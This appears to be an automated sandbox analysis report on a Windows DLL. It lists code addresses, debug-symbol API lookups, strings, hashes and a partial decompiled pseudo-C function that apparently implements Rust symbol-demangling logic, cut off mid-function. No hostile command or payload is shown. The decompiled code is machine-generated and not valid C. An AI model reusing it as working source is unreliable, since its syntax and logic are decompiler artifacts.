0x6ecceaf6
0x6ecceaf8
0x6ecceafb
0x00000000
0x6ecceb01
0x6ecceb07
0x6ecceb0d
0x6ecceb10
0x6ecceb16
0x6ecceb1c
0x6ecceb23
0x6ecceb2a
0x6ecceb31
0x6ecceb38
0x6ecceb3f
0x6ecceb46
0x6ecceb4d
0x6ecceb54
0x6ecceb5b
0x6ecceb62
0x6ecceb69
0x6ecceb70
0x6ecceb77
0x6ecceb7e
0x6ecceb85
0x6ecceb8c
0x6ecceb93
0x6ecceb94
0x6ecceb96
0x6ecceba0
0x6ecceba2
0x6eccebaa
0x6eccebad
0x6eccebb0
0x6eccebd0
0x6eccebd0
0x6eccebd3
0x6eccebd9
0x6eccebdb
0x6eccebdb
0x6eccebde
0x00000000
0x6eccebde
0x6eccebb2
0x6eccebb2
0x6eccebc0
0x6eccebc2
0x6eccebe1
0x6eccebee
0x6eccebf1
0x6eccebf6
0x6eccec10
0x6eccec13
0x6eccec16
0x6eccebf8
0x6eccebf8
0x6eccebfd
0x6eccebff
0x6eccec05
0x6eccec20
0x6eccec23
0x6eccec25
0x6eccec65
0x00000000
0x6eccec27
0x6eccec27
0x6eccec2d
0x6eccec30
0x6eccec39
0x6eccec3f
0x6eccec74
0x6eccec77
0x00000000
0x6eccec41
0x6eccec5b
0x6eccec5d
0x6eccec5d
0x6eccec3f
0x6eccec07
0x6eccec07
0x6eccec80
0x6eccec80
0x6eccec80
0x6eccec05
0x6eccec85
0x6eccec88
0x6eccec8f
0x6eccec94
0x6eccec97
0x6eccec9d
0x6eccec9f
0x6ecceca4
0x6eccecaa
0x6eccecac
0x6eccecb2
0x6eccecb7
0x6eccecb7
0x6eccecaa
0x6eccecbc
0x6eccecbc
0x6eccecbe
0x6eccecc1
0x6eccecc7
0x6eccecca
0x6eccecd5
0x6eccecd8
0x6eccecdd
0x6eccece0
0x6eccece6
0x6eccece9
0x6eccecec
0x6eccecee
0x6eccecf4
0x6eccecf7
0x6eccecfa
0x00000000
0x6ecced00
0x00000000
0x6ecced00
0x6eccecfa
0x6eccecc1
0x6eccedae
0x6eccedb5
0x6eccefaa
0x6eccefbe
0x00000000
0x6eccedbb
0x6eccedbb
0x6eccedc1
0x6eccedc4
0x6eccedcb
0x6eccedd2
0x6eccedd6
0x6ecceddd
0x6ecceddf
0x6eccee01
0x6eccee01
0x6eccee06
0x6eccee09
0x6eccee10
0x6eccee22
0x6eccee24
0x6eccee27
0x6eccee9e
0x6eccee9e
0x6eccee29
0x6eccee29
0x6eccee2c
0x6eccee2f
0x6eccee2f
0x6eccee31
0x6eccee40
0x6eccee40
0x6eccee42
0x6eccee43
0x6eccee43
0x6eccee4a
0x6eccee54
0x6eccee54
0x6ecceea6
0x6ecceeb0
0x6ecceeb6
0x6ecceebf
0x6ecceec2
0x6ecceec5
0x6ecceec8
0x6ecceecb
0x6ecceece
0x6ecceeda
0x00000000
0x6eccede1
0x6eccedec
0x6eccedf2
0x6eccedf4
0x6eccf034
0x6eccf04d
0x00000000
0x6eccedfa
0x6eccedfa
0x6eccedfc
0x00000000
0x6eccedfc
0x6eccedf4
0x6ecceddf
0x6eccedb5
0x6eccea8e
0x6eccea99
0x6eccea9f
0x6ecceaa1
0x6eccefee
0x6eccf007
0x00000000
0x6ecceaa7
0x6ecceaa7
0x6ecceaa9
0x00000000
0x6ecceaa9
0x6ecceaa1
0x6ecce7c4
0x6ecce7c4
0x6ecce7d5
0x6ecce7da
0x6ecce7dd
0x6ecce7e3
0x6ecce7ed
0x6ecce7f7
0x6ecce7f9
0x6ecce81b
0x6ecce81b
0x6ecce826
0x6ecce830
0x6ecce846
0x6ecce848
0x6ecce84b
0x6ecceedf
0x6ecceee3
0x6ecceee8
0x6ecceeec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecce851
0x6ecce857
0x6ecce85d
0x6ecce860
0x6ecce865
0x6ecce86c
0x6ecce86f
0x6ecce876
0x6ecce87d
0x6ecce884
0x6ecce88b
0x6ecce892
0x6ecce899
0x6ecce8a0
0x6ecce8a7
0x6ecce8ae
0x6ecce8b5
0x6ecce8bc
0x6ecce8c3
0x6ecce8ca
0x6ecce8d1
0x6ecce8d8
0x6ecce8df
0x6ecce8e0
0x6ecce8e2
0x6ecce8eb
0x6ecce8f2
0x6ecce8f5
0x6ecce8fd
0x6ecce900
0x6ecce903
0x6ecce906
0x6ecce909
0x6ecce920
0x6ecce920
0x6ecce923
0x6ecce929
0x6ecce92c
0x6ecce92f
0x6ecce92f
0x6ecce932
0x00000000
0x6ecce932
0x6ecce910
0x6ecce910
0x6ecce912
0x6ecce935
0x6ecce942
0x6ecce945
0x6ecce94b
0x6ecce9b0
0x6ecce9b3
0x6ecce94d
0x6ecce950
0x6ecce952
0x6ecce957
0x6ecce95d
0x6ecce95f
0x6ecce962
0x6ecce965
0x6ecce967
0x6ecce9b7
0x6ecce969
0x6ecce969
0x6ecce96f
0x6ecce97a
0x6ecce980
0x6ecce9c2
0x6ecce9c2
0x6ecce9c5
0x6ecce982
0x6ecce999
0x6ecce99b
0x6ecce99b
0x6ecce980
0x6ecce967
0x6ecce9d0
0x6ecce9d0
0x6ecce9d3
0x6ecce9db
0x6ecce9e0
0x6ecce9e3
0x6ecce9e6
0x6ecce9ec
0x6ecce9ee
0x6ecce9f3
0x6ecce9f9
0x6ecce9fb
0x6eccea01
0x6eccea06
0x6eccea06
0x6ecce9f9
0x6eccea0b
0x6eccea0b
0x6eccea0d
0x6eccea13
0x6eccea19
0x6eccea1c
0x6eccea27
0x6eccea2c
0x6eccea2f
0x6eccea35
0x6eccea38
0x6eccea3b
0x6eccea40
0x6eccea43
0x6eccea46
0x6eccea49
0x6eccea4c
0x6eccea4f
0x00000000
0x6eccea55
0x00000000
0x6eccea55
0x6eccea4f
0x6eccea0d
0x6ecced05
0x6ecced0c
0x6eccef86
0x6eccef9a
0x00000000
0x6ecced12
0x6ecced12
0x6ecced18
0x6ecced1b
0x6ecced22
0x6ecced29
0x6ecced2d
0x6ecced34
0x6ecced36
0x6ecced58
0x6ecced58
0x6ecced5d
0x6ecced60
0x6ecced67
0x6ecced70
0x6ecced72
0x6ecced75
0x6eccee5b
0x6eccee5b
0x6ecced7b
0x6ecced7b
0x6ecced7e
0x6ecced81
0x6ecced81
0x6ecced83
0x6ecced90
0x6ecced90
0x6ecced92
0x6ecced93
0x6ecced93
0x6ecced9a
0x6ecceda4
0x6ecceda4
0x6eccee63
0x6eccee6d
0x6eccee73
0x6eccee7c
0x6eccee7f
0x6eccee82
0x6eccee85
0x6eccee88
0x6eccee8b
0x6eccee97
0x00000000
0x6ecced38
0x6ecced43
0x6ecced49
0x6ecced4b
0x6eccf011
0x6eccf02a
0x00000000
0x6ecced51
0x6ecced51
0x6ecced53
0x00000000
0x6ecced53
0x6ecced4b
0x6ecced36
0x6ecced0c
0x6ecce7fb
0x6ecce806
0x6ecce80c
0x6ecce80e
0x6eccefcb
0x6eccefe4
0x6eccf055
0x6eccf055
0x6eccf057
0x6eccf060
0x6eccf07c
0x6ecce814
0x6ecce814
0x6ecce816
0x00000000
0x6ecce816
0x6ecce80e
0x6ecce7f9
0x6ecce79f
0x6ecce7a3
0x6ecceef2
0x6ecceef2
0x6ecceef6
0x6ecceefb
0x6ecceefe
0x6eccef03
0x6eccef09
0x6eccef13
0x6eccef1d
0x6eccef27
0x6eccef43
0x6eccef45
0x6eccef46
0x6eccef52
0x6eccef54
0x6eccef57
0x6eccef57
0x6eccef57
0x6eccef57
0x6ecceefe
0x6eccef63
0x6eccef65
0x6eccef68
0x6eccef6b
0x6eccef6b
0x6eccef6b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecce7a3
0x6ecce7a9
0x6ecce7a9
0x6ecce7a9
0x6eccef6e
0x6eccef74
0x6eccef82
0x6eccef82

APIs

GetProcAddress.KERNEL32(SymFromAddrW), ref: 6ECCE806
GetCurrentProcess.KERNEL32 ref: 6ECCE81B

Strings

SymGetLineFromAddrW64, xrefs: 6ECCED38
SymFromInlineContextW, xrefs: 6ECCEA8E
called `Option::unwrap()` on a `None` value, xrefs: 6ECCEFD5, 6ECCEFF8, 6ECCF01B, 6ECCF03E
SymGetLineFromInlineContextW, xrefs: 6ECCEDE1
SymFromAddrW, xrefs: 6ECCE7FB

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressCurrentProcProcess
String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
API String ID: 3217270580-808744031
Opcode ID: 50d34de69e8334ae6fd39a7d2c6eefe1c33ee6d2eedcad86b1372299e57b7cb4
Instruction ID: 359a70ccdeeeaddf68bcf3253b965752d897cedaf6c20968f1533742dbc97189
Opcode Fuzzy Hash: 50d34de69e8334ae6fd39a7d2c6eefe1c33ee6d2eedcad86b1372299e57b7cb4
Instruction Fuzzy Hash: E94267B0904B408FE725CF69C481BE3B7F1BF89714F10492ED99A87A50E775B486CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCA6D0, Relevance: 15.7, Strings: 11, Instructions: 1959
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E6ECCA6D0(void* __ebx, signed int* __ecx, signed int __edx, signed int __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a20, intOrPtr _a24) {
				char _v2;
				signed char _v3;
				void* _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v68;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v192;
				char _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _t546;
				signed int _t551;
				signed int* _t552;
				intOrPtr _t553;
				intOrPtr* _t556;
				intOrPtr _t557;
				signed int _t558;
				signed int _t565;
				signed char _t566;
				void* _t567;
				signed char* _t568;
				signed char* _t570;
				signed int _t572;
				signed int _t574;
				signed char _t575;
				signed int _t577;
				void* _t580;
				signed int _t581;
				signed int _t583;
				signed int _t587;
				void* _t589;
				signed int _t596;
				signed int _t597;
				signed char _t598;
				signed int _t599;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed char* _t606;
				signed int _t607;
				signed int _t609;
				signed int _t612;
				char* _t617;
				signed int _t618;
				signed int _t626;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t631;
				signed int _t634;
				signed int _t636;
				signed int _t642;
				signed int _t643;
				void* _t645;
				signed int _t646;
				signed int _t647;
				signed int _t651;
				signed int _t652;
				signed char* _t653;
				signed char* _t654;
				signed char* _t656;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t662;
				void* _t665;
				signed int _t669;
				signed char* _t670;
				signed int* _t675;
				signed int _t676;
				signed char _t685;
				intOrPtr _t689;
				intOrPtr* _t691;
				signed int _t692;
				signed int _t694;
				signed int _t696;
				signed int _t699;
				signed int _t700;
				signed int _t704;
				signed int _t706;
				signed int _t711;
				signed int _t713;
				signed int _t716;
				signed int _t725;
				signed int _t729;
				intOrPtr _t749;
				signed int _t751;
				intOrPtr _t755;
				signed int _t758;
				signed int _t762;
				signed char _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t769;
				signed int _t772;
				signed char* _t775;
				signed int _t776;
				signed int _t779;
				signed int _t780;
				signed char _t781;
				signed char _t783;
				signed int _t784;
				signed int _t785;
				signed char _t786;
				signed char _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t793;
				signed int _t797;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t812;
				signed int _t815;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed char* _t826;
				signed int _t831;
				signed int _t833;
				signed int _t841;
				void* _t842;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int _t852;
				signed int _t853;
				signed char* _t859;
				signed int _t860;
				signed int _t863;
				signed int _t866;
				signed int _t867;
				signed char* _t868;
				signed int _t881;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t892;
				signed int _t894;
				signed int _t895;
				void* _t896;
				signed char _t897;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				void* _t904;
				signed int _t905;
				void* _t906;
				signed char _t907;
				intOrPtr _t910;
				signed int _t911;
				void* _t913;
				signed int _t916;
				signed int _t918;
				signed int _t920;
				signed int _t921;
				signed int _t923;
				signed int _t925;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed char* _t930;
				signed char _t932;
				signed int _t933;
				signed int _t935;
				signed int _t941;
				signed int _t943;
				signed int _t945;
				signed char _t950;
				signed char _t952;
				signed int _t953;
				signed int _t956;
				signed int _t963;
				signed char* _t964;
				signed char _t967;
				signed int _t968;
				signed int _t970;
				signed int _t971;
				signed int _t973;
				signed int _t981;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				signed int _t988;
				signed int _t989;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int _t998;
				signed int _t1001;
				signed int _t1003;
				signed int _t1004;
				signed char* _t1010;
				signed char* _t1011;
				signed char* _t1012;
				signed int _t1015;
				signed int _t1017;
				signed int _t1019;
				signed int _t1020;
				signed int _t1022;
				signed int _t1025;
				signed int _t1029;
				signed int _t1030;
				signed int _t1032;
				signed int _t1037;
				signed int _t1042;
				signed int _t1044;
				signed int _t1047;
				signed int _t1048;
				signed int _t1050;
				signed int _t1051;
				signed int _t1055;
				signed int _t1058;
				signed int _t1059;
				signed int _t1061;
				signed int _t1065;
				signed int _t1066;
				signed char* _t1069;
				signed int _t1070;
				signed char* _t1076;
				signed char* _t1077;
				signed int _t1085;
				signed int _t1087;
				signed int _t1100;
				signed int _t1103;
				signed int _t1105;
				signed int _t1109;
				signed char* _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1116;
				signed int _t1119;
				signed int _t1121;
				void* _t1124;
				void* _t1127;
				void* _t1142;

				_t998 = __edi;
				_t1100 = _t1121;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_v108 = __ecx;
				_v152 = __edx;
				_push(6);
				_push(".llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy");
				_push(_a4);
				E6ECC38C0( &_v104, __edx);
				_t1124 = (_t1121 & 0xfffffff8) - 0x98 + 0xc;
				if(_v104 != 1) {
					_t1055 =  &_v32;
					asm("o16 nop [cs:eax+eax]");
					do {
						E6ECC8B60( &_v104, _t1055,  &_v104, __edi, _t1055);
						_t546 = _v32;
						__eflags = _t546 - 1;
					} while (_t546 == 1);
					__eflags = _t546;
					if(_t546 != 0) {
						goto L71;
					} else {
						_t998 = _v28;
						goto L39;
					}
				} else {
					_t711 = _v68;
					_t1055 = _v56;
					_t989 = _v52;
					_v164 = _t711;
					_v148 = _t1055;
					_v160 = _v48;
					_t713 = _v44;
					_v144 = _t713;
					if(_t711 == 0xffffffff) {
						_t998 = _v76;
						_t896 = _t998 + _t713 - 1;
						__eflags = _t896 - _t989;
						if(_t896 < _t989) {
							_v156 = _t989;
							_v112 = _v96;
							_v116 = _v92;
							_t716 = _v88;
							__eflags = _t716 - _v144;
							_t792 =  >  ? _t716 : _v144;
							_v124 =  >  ? _t716 : _v144;
							_t793 = _v160;
							_v128 = _t793 + _t716 - 1;
							_t991 = _t716;
							_v160 = _t793 + _t716;
							_t758 = _v156;
							_v164 = _t991;
							_v36 = _v80;
							_v120 = _v144 - 1;
							_v132 = _t991 - 1;
							_v136 = _t991 + _t1055;
							do {
								_t897 =  *((intOrPtr*)(_t1055 + _t896));
								__eflags = _t897 & 0x00000020;
								_t723 =  !=  ? 1 : 0xbadbad << _t897;
								_t1090 =  !=  ? 0 : 1 << _t897;
								_t724 = ( !=  ? 1 : 0xbadbad << _t897) & _v116;
								_t1091 = ( !=  ? 0 : 1 << _t897) & _v112;
								_t1092 = ( !=  ? 0 : 1 << _t897) & _v112 | ( !=  ? 1 : 0xbadbad << _t897) & _v116;
								__eflags = ( !=  ? 0 : 1 << _t897) & _v112 | ( !=  ? 1 : 0xbadbad << _t897) & _v116;
								if((( !=  ? 0 : 1 << _t897) & _v112 | ( !=  ? 1 : 0xbadbad << _t897) & _v116) == 0) {
									_t1050 = _t998 + _v144;
									__eflags = _t1050;
									_t725 = _t1050;
									goto L25;
								} else {
									_t900 = _v124;
									_t1055 = _v160;
									_v140 = _t998;
									asm("o16 nop [cs:eax+eax]");
									while(1) {
										__eflags = _v164 - _t900;
										if(_v164 == _t900) {
											break;
										}
										__eflags = _v164 + _t998 - _t758;
										if(_v164 + _t998 >= _t758) {
											_t916 = _t758;
											_t904 = _v140 + _v164;
											__eflags = _t758 - _t904;
											_t902 =  >  ? _t758 : _t904;
											goto L229;
										} else {
											_t994 =  *_t1055 & 0x000000ff;
											_t1055 = _t1055 + 1;
											_t900 = _t900 - 1;
											__eflags = _t994 -  *((intOrPtr*)(_v136 + _t998));
											_t725 = _t998 + 1;
											_t998 = _t725;
											if(__eflags == 0) {
												continue;
											} else {
												goto L25;
											}
										}
										goto L498;
									}
									_t901 = _v132;
									__eflags = _t901 - _v144;
									if(_t901 >= _v144) {
										__eflags = _v164;
										_t998 = _v140;
										if(__eflags == 0) {
											goto L39;
										} else {
											_t902 = _v132;
											goto L234;
										}
									} else {
										_t1055 = _v128;
										_t1051 = _v164;
										_t902 = _t901 + _v140;
										__eflags = _t902;
										while(1) {
											_t998 = _t1051 - 1;
											__eflags = _t998;
											if(_t998 < 0) {
												break;
											}
											__eflags = _t902 - _t758;
											if(__eflags >= 0) {
												_t916 = _t758;
												_push(0x6ed0f710);
												goto L235;
											} else {
												_t729 =  *_t1055 & 0x000000ff;
												_t1055 = _t1055 - 1;
												__eflags = _t729 -  *((intOrPtr*)(_v148 + _t902));
												_t758 = _v156;
												_t902 = _t902 - 1;
												if(__eflags == 0) {
													continue;
												} else {
													_t725 = _v140 + _v36;
													goto L25;
												}
											}
											goto L498;
										}
										_t998 = _v140;
										goto L39;
									}
								}
								goto L498;
								L25:
								_t1055 = _v148;
								_t998 = _t725;
								_t896 = _v120 + _t725;
								__eflags = _t896 - _t758;
							} while (_t896 < _t758);
						}
						goto L71;
					} else {
						_t905 = _v76;
						_t998 = _t905;
						_t906 = _t905 + _t713 - 1;
						if(_t906 >= _t989) {
							L71:
							_t916 = _v152;
							_v160 = _a4;
							goto L72;
						} else {
							_t797 = _v80;
							_v156 = _t989;
							_v140 = _v96;
							_v132 = _t797;
							_v136 = _v88;
							_v128 = _v144 - _t797;
							_v124 =  ~_v136;
							_v112 = _v92;
							_v116 = _v144 - 1;
							do {
								_t907 =  *((intOrPtr*)(_t1055 + _t906));
								_t758 = _t1055;
								_t745 =  !=  ? 1 : 0xbadbad << _t907;
								_t1095 =  !=  ? 0 : 1 << _t907;
								_t746 = ( !=  ? 1 : 0xbadbad << _t907) & _v112;
								_t1096 = ( !=  ? 0 : 1 << _t907) & _v140;
								_t1097 = ( !=  ? 0 : 1 << _t907) & _v140 | ( !=  ? 1 : 0xbadbad << _t907) & _v112;
								_t1137 = ( !=  ? 0 : 1 << _t907) & _v140 | ( !=  ? 1 : 0xbadbad << _t907) & _v112;
								if((( !=  ? 0 : 1 << _t907) & _v140 | ( !=  ? 1 : 0xbadbad << _t907) & _v112) == 0) {
									_t998 = _t998 + _v144;
									__eflags = _t998;
									_v164 = 0;
									goto L9;
								} else {
									_t995 = _t998;
									_t998 = _t998 + _t758;
									_t749 =  >  ? _v136 : _v164;
									_t910 = _t749;
									_v120 = _t749;
									_t1055 =  >  ? _t749 : _v144;
									while(_t1055 != _t910) {
										if(_t995 + _t910 >= _v156) {
											_t913 = _v120 + _t995;
											_t916 = _v156;
											__eflags = _t916 - _t913;
											_t902 =  >  ? _t916 : _t913;
											L229:
											_push(0x6ed0f6f0);
											L235:
											E6ECE9360(_t758, _t902, _t916, _t998, _t1055, __eflags);
											_t1124 = _t1124 + 4;
											asm("ud2");
											L236:
											_t809 = _t916;
											_t917 = _v160;
											_push(0x6ed0f148);
											_push(_v160);
											_push(1);
											L242:
											E6ECE9620(_t809, _t917);
											asm("ud2");
											_push(_t1100);
											_push(_t758);
											_push(_t998);
											_push(_t1055);
											_t1127 = _t1124 + 0xc - 0x50;
											_t918 = _v160;
											_t556 =  *_v164;
											__eflags =  *_t556 - 1;
											if( *_t556 != 1) {
												_v252 =  *((intOrPtr*)(_t556 + 4));
												_t557 =  *((intOrPtr*)(_t556 + 0xc));
												_v244 =  *((intOrPtr*)(_t556 + 8));
												_t812 = 0;
												_v232 = _t557;
												while(1) {
													L246:
													__eflags = _t812 - _t557;
													_v248 = _t812;
													if(_t812 == _t557) {
														break;
													}
													__eflags = _v244;
													if(__eflags == 0) {
														L473:
														E6ECE94E0(_t758, "called `Option::unwrap()` on a `None` value", 0x2b, _t998, _t1055, __eflags, 0x6ed0efc0);
														_t1127 = _t1127 + 4;
														asm("ud2");
														L474:
														_t920 = 1;
														L475:
														_v224 = _t920;
														_t921 = 0x2b;
														E6ECE95A0(_t758, "called `Result::unwrap()` on an `Err` value", 0x2b, __eflags,  &_v224, 0x6ed0eef4, 0x6ed0eff0);
														_t1127 = _t1127 + 0xc;
														asm("ud2");
														L476:
														_t815 = _t998;
														_push(0x6ed0efd0);
														L477:
														_push(_t921);
														_push(1);
														E6ECE9620(_t815, _t921);
														_t1127 = _t1127 + 0xc;
														asm("ud2");
														L478:
														E6ECE9620(_t815, _v244, 0, _t758, 0x6ed0efe0);
														_t1127 = _t1127 + 0xc;
														asm("ud2");
														L479:
														_t920 = 0;
														goto L475;
													}
													_t998 = _v252;
													_t921 = _v244;
													_t565 = _v248 + 1;
													__eflags = _t565;
													_v228 = _t565;
													_v260 = _t998 + _t921;
													asm("o16 nop [cs:eax+eax]");
													while(1) {
														_t566 =  *_t998 & 0x000000ff;
														_t1058 = _t566 & 0x000000ff;
														__eflags = _t566;
														_v256 = _t566;
														if(_t566 < 0) {
														}
														L250:
														_t860 = _t998;
														_t1015 = _v260;
														_t1105 = 0;
														_t662 = _t921;
														__eflags = _t921 - 1;
														_t758 = _t1015;
														if(_t921 != 1) {
															_t758 = _t860 + 2;
															_t1105 =  *(_t860 + 1) & 0x3f;
															__eflags = _t1105;
														}
														_t1065 = _t1058 & 0x0000001f;
														__eflags = _v256 - 0xdf;
														if(_v256 <= 0xdf) {
															_t1066 = _t1065 << 6;
															goto L260;
														} else {
															__eflags = _t758 - _t1015;
															if(_t758 == _t1015) {
																_t758 = _t1015;
																_t1105 = _t1105 << 6;
																__eflags = _v256 - 0xf0;
																if(_v256 >= 0xf0) {
																	goto L255;
																} else {
																	goto L259;
																}
															} else {
																_t1017 =  *_t758 & 0x000000ff;
																_t758 = _t758 + 1;
																_t1105 = _t1105 << 0x00000006 | _t1017 & 0x0000003f;
																__eflags = _v256 - 0xf0;
																if(_v256 < 0xf0) {
																	L259:
																	_t1066 = _t1065 << 0xc;
																	__eflags = _t1066;
																	L260:
																	_t1058 = _t1066 | _t1105;
																	_t998 = _t860;
																	_t921 = _t662;
																} else {
																	L255:
																	__eflags = _t758 - _v260;
																	if(_t758 == _v260) {
																		_t758 = 0;
																		__eflags = 0;
																	} else {
																		_t758 =  *_t758 & 0x3f;
																	}
																	_t998 = _t860;
																	_t921 = _t662;
																	_t1109 = _t1105 << 0x00000006 | (_t1065 & 0x00000007) << 0x00000012 | _t758;
																	__eflags = _t1109 - 0x110000;
																	_t1055 = _t1109;
																	if(__eflags == 0) {
																		goto L473;
																	}
																	asm("o16 nop [cs:eax+eax]");
																}
															}
														}
														L264:
														_t1055 = _t1058 + 0xffffffd0;
														_t1103 = _t998 + 1;
														__eflags = _t1055 - 0xa;
														if(_t1055 < 0xa) {
															__eflags = _t921 - 2;
															if(__eflags < 0) {
																goto L473;
															}
															__eflags =  *_t1103 - 0xbf;
															if( *_t1103 <= 0xbf) {
																goto L476;
															}
															_t921 = _t921 - 1;
															_t998 = _t1103;
															_t566 =  *_t998 & 0x000000ff;
															_t1058 = _t566 & 0x000000ff;
															__eflags = _t566;
															_v256 = _t566;
															if(_t566 < 0) {
															}
															goto L264;
														}
														_v260 = _t921;
														_t758 = _v244 - _t921;
														__eflags = _t758;
														if(__eflags == 0) {
															goto L479;
														}
														_t815 = _v252;
														if(__eflags < 0) {
															goto L478;
														}
														__eflags =  *((char*)(_t815 + _t758)) - 0xc0;
														if( *((char*)(_t815 + _t758)) < 0xc0) {
															goto L478;
														}
														_t567 =  *_t815;
														_v264 = _t998;
														__eflags = _t567 - 0x2d;
														if(_t567 == 0x2d) {
															_t568 = _v252;
															__eflags = _t758 - 1;
															if(__eflags == 0) {
																goto L474;
															}
														} else {
															__eflags = _t567 - 0x2b;
															if(_t567 != 0x2b) {
																_t568 = _v252;
															} else {
																_t661 = _v252;
																_t758 = _t758 - 1;
																__eflags = _t758;
																if(__eflags == 0) {
																	goto L474;
																}
																_t568 = _t661 + 1;
															}
														}
														_t1059 = 0;
														asm("o16 nop [cs:eax+eax]");
														while(1) {
															__eflags = _t758;
															if(_t758 == 0) {
																break;
															}
															_t998 = ( *_t568 & 0x000000ff) + 0xffffffd0;
															__eflags = _t998 - 9;
															if(__eflags > 0) {
																goto L474;
															}
															_t859 = _t568;
															_t659 = _t1059 * 0xa;
															__eflags = _t659;
															_t920 = 2;
															if(__eflags < 0) {
																goto L475;
															}
															_t758 = _t758 - 1;
															_t568 =  &(_t859[1]);
															_t1059 = _t659 + _t998;
															__eflags = _t1059;
															if(__eflags >= 0) {
																continue;
															} else {
																goto L475;
															}
															goto L498;
														}
														__eflags = _t1059;
														if(_t1059 == 0) {
															_t762 = _v260;
															_v252 = _v264;
															_t570 = _v160;
															__eflags =  *_t570 & 0x00000004;
															if(( *_t570 & 0x00000004) != 0) {
																goto L294;
															} else {
																goto L320;
															}
														} else {
															_t758 = _v260;
															__eflags = _t758 - _t1059;
															if(__eflags <= 0) {
																if(__eflags != 0) {
																	goto L480;
																} else {
																	_t825 = _v264;
																	__eflags = _t758 - _t1059;
																	if(_t758 != _t1059) {
																		goto L481;
																	} else {
																		goto L293;
																	}
																}
															} else {
																_t657 = _v264;
																__eflags =  *((char*)(_t657 + _t1059)) - 0xbf;
																if( *((char*)(_t657 + _t1059)) <= 0xbf) {
																	L480:
																	_t820 = _v264;
																	_t924 = _t758;
																	_push(0x6ed0f000);
																	_push(_t758);
																	goto L488;
																} else {
																	_t825 = _v264;
																	__eflags =  *((char*)(_t825 + _t1059)) - 0xbf;
																	if( *((char*)(_t825 + _t1059)) > 0xbf) {
																		L293:
																		_v252 = _t825 + _t1059;
																		_t656 = _v160;
																		__eflags =  *_t656 & 0x00000004;
																		if(( *_t656 & 0x00000004) == 0) {
																			L320:
																			__eflags = _v248;
																			if(_v248 == 0) {
																				L322:
																				__eflags = _t1059 - 2;
																				if(_t1059 < 2) {
																					L324:
																					_t998 = _t1059;
																					goto L325;
																				} else {
																					__eflags = ( *_v264 & 0x0000ffff) - 0x245f;
																					if(( *_v264 & 0x0000ffff) == 0x245f) {
																						__eflags =  *_t1103 - 0xbf;
																						if( *_t1103 <= 0xbf) {
																							_t825 = _v264;
																							_t927 = _t1059;
																							_push(0x6ed0f024);
																							goto L484;
																						} else {
																							_t535 = _t1059 - 1; // -1
																							_t998 = _t535;
																							_v264 = _t1103;
																							L325:
																							_t758 = _t762 - _t1059;
																							__eflags = _t758;
																							_t1055 = _v264;
																							_v244 = _t758;
																							while(1) {
																								L326:
																								__eflags = _t998;
																								_v264 = _t1055;
																								if(_t998 == 0) {
																									break;
																								}
																								_t580 =  *_t1055;
																								__eflags = _t580 - 0x24;
																								if(_t580 == 0x24) {
																									__eflags = _t998 - 2;
																									if(_t998 < 2) {
																										L361:
																										_t1055 = _t1055 + 1;
																										_t449 = _t998 - 1; // -1
																										_t581 = _t449;
																										_t924 =  &_v224;
																										_v260 = _t998;
																										_v224 = _t1055;
																										_v220 = _t581;
																										_v216 = 0;
																										_v212 = _t581;
																										_v208 = 0x24;
																										_v204 = 1;
																										_v200 = 0x24;
																										E6ECC48F0( &_v196,  &_v224);
																										__eflags = _v196 - 1;
																										if(_v196 != 1) {
																											L245:
